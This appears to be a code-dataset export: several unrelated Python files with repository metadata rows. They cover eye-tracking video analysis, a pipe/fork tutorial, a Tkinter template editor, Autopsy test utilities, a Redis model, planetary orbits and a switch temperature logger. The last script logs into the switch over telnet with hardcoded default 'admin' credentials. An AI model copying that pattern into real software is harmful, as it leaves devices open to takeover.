os.makedirs(alignment_folder)
# create a temp folder in current working directory to store data (contents of unzipped folder)
day_folder = os.path.join(current_working_directory, "temp")
# unzip current zipped folder into temp folder, this function checks whether the folder is unzippable
# if it unzips, the function returns True; if it doesn't unzip, the function returns False
if unpack_to_temp(day_zipped, day_folder):
# List all trial folders
trial_folders = list_sub_folders(day_folder)
num_trials = len(trial_folders)
current_trial = 0
stim_vids = [24.0, 25.0, 26.0, 27.0, 28.0, 29.0]
stim_name_to_float = {"stimuli024": 24.0, "stimuli025": 25.0, "stimuli026": 26.0, "stimuli027": 27.0, "stimuli028": 28.0, "stimuli029": 29.0}
stim_float_to_name = {24.0: "stimuli024", 25.0: "stimuli025", 26.0: "stimuli026", 27.0: "stimuli027", 28.0: "stimuli028", 29.0: "stimuli029"}
for trial_folder in trial_folders:
# add exception handling so that a weird day doesn't totally break everything
try:
trial_name = trial_folder.split(os.sep)[-1]
# Load CSVs and create timestamps
# ------------------------------
# Get world movie timestamp csv path
world_csv_path = glob.glob(trial_folder + '/*world.csv')[0]
stimuli_name = world_csv_path.split("_")[-2]
stimuli_number = stim_name_to_float[stimuli_name]
# at what time resolution to build eye and world camera data?
bucket_size = 4 #milliseconds
# Load world CSV
world_timestamps = np.genfromtxt(world_csv_path, dtype=np.str, delimiter=' ')
# Get eye timestamp csv paths
right_eye_csv_path = glob.glob(trial_folder + '/*righteye.csv')[0]
left_eye_csv_path = glob.glob(trial_folder + '/*lefteye.csv')[0]
# Load eye CSVs
right_eye_timestamps = np.genfromtxt(right_eye_csv_path, dtype=np.str, delimiter=' ')
left_eye_timestamps = np.genfromtxt(left_eye_csv_path, dtype=np.str, delimiter=' ')
# Get world video filepath
world_video_path = glob.glob(trial_folder + '/*world.avi')[0]
# Open world video
world_video = cv2.VideoCapture(world_video_path)
### NOW WE ARE FINDING PUPILS FOR THE WHOLE STIMULI SEQUENCE ###
# Show the frame to check where we are starting pupil finding (ground truth)
fig_name = trial_name + ".png"
fig_path = os.path.join(alignment_folder, fig_name)
ret, frame = world_video.read()
plt.imshow(frame)
plt.savefig(fig_path)
plt.show(block=False)
plt.pause(1)
plt.close()
# ------------------------------
world_video.release()
# ------------------------------
# ------------------------------
# Now start pupil detection
# ------------------------------
# Get right eye video filepath
right_video_path = glob.glob(trial_folder + '/*righteye.avi')[0]
# Get left eye video filepath
left_video_path = glob.glob(trial_folder + '/*lefteye.avi')[0]
# Find right eye pupils and save pupil data
print("Finding right eye pupils...")
find_pupil("right", stimuli_name, current_trial, right_video_path, right_eye_timestamps, 0, csv_folder, bucket_size)
# Find left eye pupils and save pupil data
print("Finding left eye pupils...")
find_pupil("left", stimuli_name, current_trial, left_video_path, left_eye_timestamps, 0, csv_folder, bucket_size)
# Report progress
cv2.destroyAllWindows()
print("Finished Trial: {trial}".format(trial=current_trial))
current_trial = current_trial + 1
except Exception:
cv2.destroyAllWindows()
print("Trial {trial} failed!".format(trial=current_trial))
current_trial = current_trial + 1
# report progress
world_video.release()
cv2.destroyAllWindows()
print("Finished {day}".format(day=day_zipped[:-4]))
# delete temporary file with unzipped data contents
print("Deleting temp folder of unzipped data...")
shutil.rmtree(day_folder)
print("Delete successful!")
#FIN
print("Completed analysis on all data folders in this drive!")
# close logfile
sys.stdout.close() | 50.066372 | 157 | 0.605833 | 2,818 | 22,630 | 4.67885 | 0.188077 | 0.020705 | 0.020174 | 0.02336 | 0.170876 | 0.119075 | 0.070155 | 0.027835 | 0.0135 | 0.006219 | 0 | 0.022375 | 0.287053 | 22,630 | 452 | 158 | 50.066372 | 0.794843 | 0.279629 | 0 | 0.067416 | 0 | 0 | 0.053207 | 0.006271 | 0.003745 | 0 | 0 | 0 | 0 | 1 | 0.041199 | false | 0.003745 | 0.044944 | 0 | 0.116105 | 0.044944 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2fd2a455b0fa197bf807b50d91f470950216cf8 | 946 | py | Python | tutorial_orchestrator.py | liordon/motion_detector | 7c22062bb3a8b254d9e4a3d6d88a89d89320785a | [
"Unlicense"
] | null | null | null | tutorial_orchestrator.py | liordon/motion_detector | 7c22062bb3a8b254d9e4a3d6d88a89d89320785a | [
"Unlicense"
] | null | null | null | tutorial_orchestrator.py | liordon/motion_detector | 7c22062bb3a8b254d9e4a3d6d88a89d89320785a | [
"Unlicense"
] | null | null | null | # Python program to explain os.pipe() method
# importing os module
import os
# Create a pipe
r, w = os.pipe()
# The returned file descriptor r and w
# can be used for reading and
# writing respectively.
# We will create a child process
# and using these file descriptor
# the parent process will write
# some text and child process will
# read the text written by the parent process
# Create a child process
pid = os.fork()
# pid greater than 0 represents
# the parent process
if pid > 0:
# This is the parent process
# Closes file descriptor r
os.close(r)
# Write some text to file descriptor w
print("Parent process is writing")
text = b"Hello child process"
os.write(w, text)
print("Written text:", text.decode())
else:
# This is the parent process
# Closes file descriptor w
os.close(w)
# Read the text written by parent process
print("\nChild Process is reading")
r = os.fdopen(r)
print("Read text:", r.read())
| 19.306122 | 45 | 0.713531 | 154 | 946 | 4.383117 | 0.37013 | 0.134815 | 0.118519 | 0.056296 | 0.183704 | 0.124444 | 0.124444 | 0.124444 | 0 | 0 | 0 | 0.002649 | 0.201903 | 946 | 48 | 46 | 19.708333 | 0.891391 | 0.61945 | 0 | 0 | 0 | 0 | 0.275148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2fe0379026d2d4ae1ca0a364d794c57d26a8a7e | 1,816 | py | Python | evaluation/classify_lib.py | uwplse/staccato | aad14e2ef37ad73dda9e1dffd9b5889b4b959125 | [
"MIT"
] | 1 | 2017-02-21T07:10:35.000Z | 2017-02-21T07:10:35.000Z | evaluation/classify_lib.py | uwplse/staccato | aad14e2ef37ad73dda9e1dffd9b5889b4b959125 | [
"MIT"
] | null | null | null | evaluation/classify_lib.py | uwplse/staccato | aad14e2ef37ad73dda9e1dffd9b5889b4b959125 | [
"MIT"
] | null | null | null | import yaml
import sys
expand = {
"$$StaccatoGroup-1": ["mail.smtp.username","mail.smtp.password"],
"$$StaccatoGroup-0": ["LocaleLanguage","LocaleCountry","LocaleVariant"]
}
def compute_stats(untested, checked, option_spec):
checked = set(checked) & set(option_spec["all_props"])
nums = {
"checked": len(checked),
"updated": len(option_spec["updated"]),
"immutable": len(option_spec["immutable"]),
"internal": len(option_spec["internal"]),
"untested": len(untested),
"other": len(option_spec["other"]),
"total": len(option_spec["all_props"])
}
num = len(checked) + len(option_spec["updated"])
coverage = (num * 100) / float(num + len(untested) + len(option_spec['internal']))
nums["coverage"] = coverage
return nums
def parse_checked(prop_file):
check = None
with open(prop_file, 'r') as f:
check = yaml.load(f)
for k1 in list(check.iterkeys()):
values = set(check[k1])
for (k,v) in expand.iteritems():
if k in values:
values.remove(k)
values |= set(v)
check[k1] = list(values)
checked_props = set(check["con"]) | set(check["strict"])
tested_props = set(check["write"])
return tested_props & checked_props
def parse(option_file, prop_file):
option_spec = None
with open(option_file, 'r') as f:
option_spec = yaml.load(f)
checked_props = parse_checked(prop_file)
candidate_props = set(option_spec["all_props"]) - (set(option_spec["immutable"]) | set(option_spec["updated"]) | set(option_spec["internal"]) | set(option_spec["other"]))
checked_props = checked_props & candidate_props
untested = candidate_props - checked_props
return compute_stats(untested, checked_props, option_spec)
| 37.061224 | 174 | 0.636564 | 224 | 1,816 | 4.973214 | 0.28125 | 0.152603 | 0.081688 | 0.048474 | 0.037702 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005579 | 0.210352 | 1,816 | 48 | 175 | 37.833333 | 0.771269 | 0 | 0 | 0 | 0 | 0 | 0.155837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0.022727 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c004a9dc65a2f46fbd46a5fc35d9ba037bc9ac6 | 4,975 | py | Python | TemplateCreator.py | thomas-schweich/WIZ | d279003c0eb7e9bd7037f493a6fea758a19d5d96 | [
"MIT"
] | null | null | null | TemplateCreator.py | thomas-schweich/WIZ | d279003c0eb7e9bd7037f493a6fea758a19d5d96 | [
"MIT"
] | null | null | null | TemplateCreator.py | thomas-schweich/WIZ | d279003c0eb7e9bd7037f493a6fea758a19d5d96 | [
"MIT"
] | null | null | null | import Tkinter as Tk
import tkFileDialog
from ExpressionChain import ExpressionChain
import pickle
class TemplateCreator(Tk.Toplevel):
__author__ = "Thomas Schweich"
def __init__(self, *args, **kwargs):
Tk.Toplevel.__init__(self, *args, **kwargs)
Tk.Label(self, text="Create A Template").pack()
self.instructionsFrame = Tk.Frame(self)
self.instructionsFrame.pack(side=Tk.TOP)
self.instructionsShown = True
self.instructions = \
Tk.Label(self.instructionsFrame, justify=Tk.LEFT,
text="* Each line you create below is evaluated as a user written expression.\n"
"* Lines which evaluate to graphs will be plotted to the screen when the template is loaded."
"\n* A graph containing the data you load using the template can be referenced by "
"typing '<ORIGINAL>' with no quotes.\n"
"* Expressions down the line can access names defined above them, but not below them. "
"Thus, operations can be chained.")
self.instructions.pack(side=Tk.TOP)
self.hidebutton = Tk.Label(self.instructionsFrame, text="Hide", fg="blue")
self.hidebutton.bind("<Button-1>", self.showHide)
self.hidebutton.pack(side=Tk.BOTTOM)
self.baseframe = Tk.Frame(self)
self.baseframe.pack(fill=Tk.BOTH, side=Tk.TOP)
# Convenience functions for creating a label that says "Name: " or "Expression: "
self.nameLabel = lambda frame: Tk.Label(frame, text="Name: ")
self.expLabel = lambda frame: Tk.Label(frame, text="Expression: ")
# Create buttons in separate frame which stays on the bottom of the window
self.buttonFrame = Tk.Frame(self)
self.buttonFrame.pack(side=Tk.BOTTOM)
self.addButton = Tk.Button(self.buttonFrame, text="Add Expression", command=self.addExp)
self.addButton.pack(side=Tk.LEFT)
self.saveButton = Tk.Button(self.buttonFrame, text="Save Template", command=self.save)
self.saveButton.pack(side=Tk.RIGHT)
self.dropdownFrame = Tk.Frame(self)
self.dropdownFrame.pack(side=Tk.BOTTOM)
self.dropdownVar = Tk.StringVar(self)
self.dropdownVar.set("ORIGINAL")
self.dropdown = Tk.OptionMenu(self.dropdownFrame, self.dropdownVar, "ORIGINAL")
self.dropdown.pack(side=Tk.LEFT)
self.addDropButton = Tk.Button(self.dropdownFrame, text="Insert", command=self.insert)
self.addDropButton.pack(side=Tk.RIGHT)
self.frames = []
self.names = []
self.nameVars = []
self.expressions = []
# Create first set of entries manually
self.addExp()
self.names[0].insert(0, "Graph 1")
self.expressions[0].insert(0, "<ORIGINAL>")
self.error = Tk.Label(self.baseframe, text="Invalid selection", fg="red")
def showHide(self, _):
if self.instructionsShown:
self.instructions.pack_forget()
self.hidebutton.configure(text="Show")
self.instructionsShown = False
else:
self.instructions.pack()
self.hidebutton.configure(text="Hide")
self.instructionsShown = True
def insert(self):
try:
self.focus_get().insert(Tk.INSERT, "<%s>" % self.dropdownVar.get())
except TypeError:
pass # No Entry selected
def addExp(self):
"""Creates new labels and entries, adding the entries to their respective lists for later usage"""
newFrame = Tk.Frame(self.baseframe)
newFrame.pack(side=Tk.TOP, fill=Tk.X)
nameLabel = self.nameLabel(newFrame)
nameLabel.pack(side=Tk.LEFT)
nameVar = Tk.StringVar(self)
nameVar.trace('w', self.updateOptions)
self.nameVars.append(nameVar)
name = Tk.Entry(newFrame, textvariable=nameVar)
name.pack(side=Tk.LEFT)
expLabel = self.expLabel(newFrame)
expLabel.pack(side=Tk.LEFT)
exp = Tk.Entry(newFrame, width=100)
exp.pack(side=Tk.LEFT, fill=Tk.X)
self.frames.append(newFrame)
self.names.append(name)
self.expressions.append(exp)
def updateOptions(self, *args):
self.dropdown.destroy()
self.dropdown = Tk.OptionMenu(self.dropdownFrame, self.dropdownVar, "ORIGINAL", *[n.get() for n in self.nameVars])
self.dropdown.pack(side=Tk.LEFT)
def save(self):
self.error.pack_forget()
chain = ExpressionChain()
for i, name in enumerate(self.names):
chain.addExp(self.expressions[i].get(), name.get())
path = tkFileDialog.asksaveasfilename(defaultextension=".wizt",
filetypes=[("WIZ Template", ".wizt")])
try:
with open(path, 'w+') as f:
pickle.dump(chain, f)
except IOError:
self.error.pack()
| 45.227273 | 122 | 0.620302 | 582 | 4,975 | 5.274914 | 0.321306 | 0.03127 | 0.04886 | 0.031922 | 0.157003 | 0.076222 | 0.041694 | 0.041694 | 0.041694 | 0 | 0 | 0.002455 | 0.263116 | 4,975 | 109 | 123 | 45.642202 | 0.83497 | 0.060503 | 0 | 0.061856 | 0 | 0 | 0.128189 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061856 | false | 0.010309 | 0.041237 | 0 | 0.123711 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c0229beb24a3ecf96c94f188d830144aacc012f | 5,525 | py | Python | test/script/regression_utils.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 1,473 | 2015-01-02T06:13:10.000Z | 2022-03-30T09:45:34.000Z | test/script/regression_utils.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 1,068 | 2015-02-04T14:33:38.000Z | 2022-03-31T03:49:28.000Z | test/script/regression_utils.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 510 | 2015-01-09T19:46:08.000Z | 2022-03-23T13:25:34.000Z | import os
import sys
import subprocess
from time import localtime, strftime
import traceback
# Returns a Windows style path starting with the cwd and
# ending with the list of directories given
def make_local_path(*dirs):
path = wgetcwd().decode("utf-8")
for dir in dirs:
path += ("\\" + str(dir))
return path_fix(path)
# Returns a Windows style path based only off the given directories
def make_path(*dirs):
path = dirs[0]
for dir in dirs[1:]:
path += ("\\" + str(dir))
return path_fix(path)
# Returns a path based on the os.
def make_os_path(platform, *dirs):
if platform == "cygwin":
path = ""
for dir in dirs:
path += str(dir).replace('\\', '/') + '/'
return path_fix(path)
elif platform == "win32":
return make_path(*dirs)
else:
print("Couldn't make path, because we only support Windows and Cygwin at this time.")
sys.exit(1)
# Fix a standard os.path by making it Windows format
def path_fix(path):
return os.path.normcase(os.path.normpath(path))
# Gets the true current working directory instead of Cygwin's
def wgetcwd():
proc = subprocess.Popen(("cygpath", "-m", os.getcwd()), stdout=subprocess.PIPE)
out,err = proc.communicate()
tst = out.rstrip()
if os.getcwd == tst:
return os.getcwd
else:
proc = subprocess.Popen(("cygpath", "-m", os.getcwd()), stdout=subprocess.PIPE)
out,err = proc.communicate()
return out.rstrip()
# Verifies a file's existance
def file_exists(file):
try:
if os.path.exists(file):
return os.path.exists(file) and os.path.isfile(file)
except:
return False
# Verifies a directory's existance
def dir_exists(dir):
try:
return os.path.exists(dir) and os.path.isdir(dir)
except:
return False
# Returns the nth word in the given string or "" if n is out of bounds
# n starts at 0 for the first word
def get_word_at(string, n):
words = string.split(" ")
if len(words) >= n:
return words[n]
else:
return ""
# Returns true if the given file is one of the required input files
# for ingest testing
def required_input_file(name):
if ((name == "notablehashes.txt-md5.idx") or
(name == "notablekeywords.xml") or
(name == "nsrl.txt-md5.idx")):
return True
else:
return False
def image_type(image_file):
if (dir_exists(image_file)):
return IMGTYPE.LOGICAL
ext_start = image_file.rfind(".")
if (ext_start == -1):
return IMGTYPE.UNKNOWN
ext = image_file[ext_start:].lower()
if (ext == ".img" or ext == ".dd"):
return IMGTYPE.RAW
elif (ext == ".e01"):
return IMGTYPE.ENCASE
elif (ext == ".aa" or ext == ".001"):
return IMGTYPE.SPLIT
else:
return IMGTYPE.UNKNOWN
# Returns the type of image file, based off extension
class IMGTYPE:
RAW, ENCASE, SPLIT, LOGICAL, UNKNOWN = range(5)
def get_image_name(image_file):
path_end = image_file.rfind("/")
path_end2 = image_file.rfind("\\")
ext_start = image_file.rfind(".")
if (image_type(image_file) == IMGTYPE.LOGICAL):
name = image_file[path_end2+1:]
return name
if(ext_start == -1):
name = image_file
if(path_end2 != -1):
name = image_file[path_end2+1:ext_start]
elif(ext_start == -1):
name = image_file[path_end+1:]
elif(path_end == -1):
name = image_file[:ext_start]
elif(path_end!=-1 and ext_start!=-1):
name = image_file[path_end+1:ext_start]
else:
name = image_file[path_end2+1:ext_start]
return name
def usage():
"""Return the usage description of the test script."""
return """
Usage: ./regression.py [-f FILE] [OPTIONS]
Run RegressionTest.java, and compare the result with a gold standard.
By default, the script tests every image in ../input
When the -f flag is set, this script only tests a single given image.
When the -l flag is set, the script looks for a configuration file,
which may outsource to a new input directory and to individual images.
Expected files:
An NSRL database at: ../input/nsrl.txt-md5.idx
A notable hash database at: ../input/notablehashes.txt-md5.idx
A notable keyword file at: ../input/notablekeywords.xml
Options:
-r Rebuild the gold standards for the image(s) tested.
-i Ignores the ../input directory and all files within it.
-u Tells Autopsy not to ingest unallocated space.
-k Keeps each image's Solr index instead of deleting it.
-v Verbose mode; prints all errors to the screen.
-e ex Prints out all errors containing ex.
-l cfg Runs from configuration file cfg.
-c Runs in a loop over the configuration file until canceled. Must be used in conjunction with -l
-fr Will not try download gold standard images
"""
#####
# Enumeration definition (python 3.2 doesn't have enumerations, this is a common solution
# that allows you to access a named enum in a Java-like style, i.e. Numbers.ONE)
#####
def enum(*seq, **named):
enums = dict(zip(seq, range(len(seq))), **named)
return type('Enum', (), enums)
def get_files_by_ext(dir_path, ext):
"""Get a list of all the files with a given extenstion in the directory.
Args:
dir: a pathto_Dir, the directory to search.
ext: a String, the extension to search for. i.e. ".html"
"""
return [ os.path.join(dir_path, file) for file in os.listdir(dir_path) if
file.endswith(ext) ]
| 31.571429 | 110 | 0.651041 | 826 | 5,525 | 4.276029 | 0.307506 | 0.043318 | 0.029445 | 0.028879 | 0.1594 | 0.132503 | 0.106455 | 0.096829 | 0.079841 | 0.043035 | 0 | 0.008511 | 0.234389 | 5,525 | 174 | 111 | 31.752874 | 0.826478 | 0.182443 | 0 | 0.265625 | 0 | 0.007813 | 0.331989 | 0.02509 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109375 | false | 0 | 0.039063 | 0.007813 | 0.359375 | 0.015625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c02b3f5d82f23e8e16a36d480f74abb2312e219 | 4,773 | py | Python | domain_model.py | malingreats/domainmodel | 3c64f5f7e0b26b301c9ac781e7b2764d958cbfe0 | [
"MIT"
] | null | null | null | domain_model.py | malingreats/domainmodel | 3c64f5f7e0b26b301c9ac781e7b2764d958cbfe0 | [
"MIT"
] | null | null | null | domain_model.py | malingreats/domainmodel | 3c64f5f7e0b26b301c9ac781e7b2764d958cbfe0 | [
"MIT"
] | 2 | 2020-10-19T14:47:38.000Z | 2021-09-19T17:14:56.000Z | def is_key(_value):
"""
Check if a value is a key, i.e. has to be looked up on Redis root level.
:param _value: The string to be checked.
:return: True if the given value is a Redis key, false otherwise.
"""
return '_' in _value and ':' in _value
class DomainModel(object):
"""
Domain Model class.
It persists Python dictionaries with an 'entity_id' to Redis Hashes, Lists and Sets.
Currently only 1 level of nesting is supported.
"""
redis = None
def __init__(self, _redis):
"""
:param _redis: A redis instance.
"""
self.redis = _redis
def create(self, _topic, _values):
"""
Set an entity.
:param _topic: The type of entity.
:param _values: The entity properties.
"""
self.redis.sadd('{}_ids'.format(_topic), _values['entity_id'])
for k, v in _values.items():
if isinstance(v, list):
lid = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, lid)
self.redis.rpush(lid, *v)
elif isinstance(v, set):
sid = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, sid)
self.redis.sadd(sid, *v)
elif isinstance(v, dict):
did = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, did)
self.redis.hmset(did, v)
else:
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, v)
def retrieve(self, _topic):
"""
Get an entity.
:param _topic: The type of entity.
:return: A dict with the entity properties.
"""
result = {}
for eid in self.redis.smembers('{}_ids'.format(_topic)):
result[eid] = self.redis.hgetall('{}_entity:{}'.format(_topic, eid))
for k, v in result[eid].items():
if is_key(v):
rtype = self.redis.type(v)
if rtype == 'list':
result[eid][k] = self.redis.lrange(v, 0, -1)
elif rtype == 'set':
result[eid][k] = self.redis.smembers(v)
elif rtype == 'hash':
result[eid][k] = self.redis.hgetall(v)
else:
raise ValueError('unknown redis type: {}'.format(rtype))
return result
def update(self, _topic, _values):
"""
Delete and set an entity.
:param _topic: The type of entity.
:param _values: The entity properties.
"""
for k, v in _values.items():
if isinstance(v, list):
lid = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, lid)
self.redis.delete(lid)
self.redis.rpush(lid, *v)
elif isinstance(v, set):
sid = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, sid)
self.redis.delete(sid)
self.redis.sadd(sid, *v)
elif isinstance(v, dict):
did = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, did)
self.redis.delete(did)
self.redis.hmset(did, *v)
else:
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, v)
def delete(self, _topic, _values):
"""
Delete an entity.
:param _topic: The type of entity.
:param _values: The entity properties.
"""
self.redis.srem('{}_ids'.format(_topic), 1, _values['entity_id'])
self.redis.delete('{}_entity:{}'.format(_topic, _values['entity_id']))
for k, v in _values.items():
if isinstance(v, (list, set, dict)):
self.redis.delete('{}_{}:{}'.format(_topic, k, _values['entity_id']))
def exists(self, _topic, _id=None):
"""
Check if an entity exists.
:param _topic: The type of entity.
:param _id: An optional entity ID.
:return: True iff an entity exists, False otherwise.
"""
if self.redis.exists('{}_ids'.format(_topic)):
return True if not _id else self.redis.sismember('{}_ids'.format(_topic), _id)
return False
| 38.804878 | 92 | 0.521894 | 557 | 4,773 | 4.260323 | 0.179533 | 0.117573 | 0.106195 | 0.096924 | 0.559208 | 0.525495 | 0.51201 | 0.499368 | 0.485461 | 0.485461 | 0 | 0.001242 | 0.325162 | 4,773 | 122 | 93 | 39.122951 | 0.735486 | 0.187932 | 0 | 0.441176 | 0 | 0 | 0.111851 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102941 | false | 0 | 0 | 0 | 0.191176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c03a4cb5c8cb51274aeb2b304ebfb9727d871e7 | 3,287 | py | Python | ODModules/planet.py | Ktrio3/orbital-drift | 11adeb0a436f8e2632dfd12c4280d28134494ff4 | [
"MIT"
] | null | null | null | ODModules/planet.py | Ktrio3/orbital-drift | 11adeb0a436f8e2632dfd12c4280d28134494ff4 | [
"MIT"
] | null | null | null | ODModules/planet.py | Ktrio3/orbital-drift | 11adeb0a436f8e2632dfd12c4280d28134494ff4 | [
"MIT"
] | null | null | null | #############################
# Planet.py
# Created by: Kevin Dennis, 2016-09-06
#
# Purpose: The planet class contains methods for plotting a planet using
# Kepler's planetary laws
#############################
import math
class Planet:
########
# Values of Planet class
########
#
# name -> String, name of planet
# orbitX -> array
# orbitY -> array
# orbitZ -> array
#
# NOTE: All orbital elements are updated constantly while drawing the
# orbits. There is currently no tracking of these values while graphing.
#
#
# VARIABLES ADDED BY VSOP87
# eclipLong -> float, radians, ecliptical longitude
# helioLat -> float, radians, heliocentric latitude
# radVector -> float, radians, radius vactor
#
# VARIABLES ADDED BY SchlyterCalc
# longAscNode -> float, longitude of the ascending node
# incElip -> float, inclination to the ecliptic
# argPerih -> float, argument of perihelion
# semiMajAx -> float, semi-major axis
# meanAnom -> float, Radians. Mean Anomaly
# eccen -> float, Radians. Eccentricity.
# eccenAnom -> float, Radians. Eccentic Anomaly.
# distance -> float, distance from sun
# xAnom -> float, x Anomaly
# yAnom -> float, y Anomaly
# anom -> true Anomaly
################
# __init__
################
# Creates a planet object and initializes the planet data using the info
# provided in __________
def __init__(self, name, epoch, dbResults):
self.epoch = epoch
if dbResults != 0:
self.name = dbResults['planet_name']
self.id = dbResults['id']
self.num_moons = dbResults['num_moons']
self.size_ratio = dbResults['size_ratio']
self.color = dbResults['default_color']
self.orbit_color = dbResults['default_orbit_color']
self.elements = {}
self.orbitXSchlyter = []
self.orbitYSchlyter = []
self.orbitZSchlyter = []
self.orbitXVSOP = []
self.orbitYVSOP = []
self.orbitZVSOP = []
self.method = []
###############################
# setElements
###############################
# Creates the dictionary of elements for the planet from the database.
# Note that this does not retrieve coefficients or terms. It retrieves the
# name and id of each element and places it in the dictionary.
def setElementsDict(self, dbInterface):
data = dbInterface.getAllElements()
for element in data:
self.elements[element['variable']] = {
"id": element['id'],
"name": element['element_name'],
"units": element['units'],
}
###############################
# setSchlyterTerms
###############################
# Retrieves the terms used for the Schlyter method from the database
# and adds them to the DB.
def setSchlyterTerms(self, dbInterface):
for key in self.elements:
data = dbInterface.getSchlyterTerms(
self.id, self.elements[key]['id'])
self.elements[key]['coefficient'] = data[0]['coefficient']
self.elements[key]['constant'] = data[0]['constant']
| 34.968085 | 78 | 0.564953 | 327 | 3,287 | 5.593272 | 0.474006 | 0.039366 | 0.024604 | 0.018589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005478 | 0.278065 | 3,287 | 93 | 79 | 35.344086 | 0.765276 | 0.435656 | 0 | 0 | 0 | 0 | 0.089817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.030303 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c0561d600429d487b01233e4a2b2fcc46e83284 | 1,587 | py | Python | skywinder/housekeeping/ethernet_switch.py | PolarMesosphericClouds/SkyWinder | ee136cffca167905ebcd3edf88e2c7456b56a51a | [
"BSD-3-Clause"
] | null | null | null | skywinder/housekeeping/ethernet_switch.py | PolarMesosphericClouds/SkyWinder | ee136cffca167905ebcd3edf88e2c7456b56a51a | [
"BSD-3-Clause"
] | null | null | null | skywinder/housekeeping/ethernet_switch.py | PolarMesosphericClouds/SkyWinder | ee136cffca167905ebcd3edf88e2c7456b56a51a | [
"BSD-3-Clause"
] | null | null | null | import telnetlib
import re
import os
import time
log_dir = '/var/pmclogs/housekeeping/switch'
def get_switch_info(address='pmc-ethernet-switch-0'):
tn = telnetlib.Telnet(address,timeout=60)
tn.read_until('Username:')
tn.write('admin\r')
tn.read_until('Password:')
tn.write('admin\r')
tn.read_until('#')
tn.write('show version\r')
result = tn.read_until('#')
# tn.write('show env power\r') #this doesn't seem to work over telnet
# result += tn.read_until('#')
tn.write('exit\r')
tn.close()
return result
def parse_switch_info(info):
temperature_string = re.findall(' \d+\.\d C',info)
if temperature_string:
temperature_string = temperature_string[0]
try:
temperature = float(temperature_string[:-1])
except Exception as e:
print(temperature_string, e)
temperature = None
return temperature
if __name__ == "__main__":
filename = os.path.join(log_dir,(time.strftime('%Y-%m-%d_%H%M%S.csv')))
with open(filename,'w') as fh:
fh.write('epoch,temperature\n')
last_epoch = 0
while True:
if time.time() - last_epoch > 30:
temperature = None
epoch = time.time()
try:
temperature = parse_switch_info(get_switch_info())
print(time.ctime(), ' : ', temperature)
except Exception as e:
print(e)
with open(filename,'a') as fh:
fh.write('%r,%r\n' % (epoch,temperature))
last_epoch = epoch
else:
time.sleep(1)
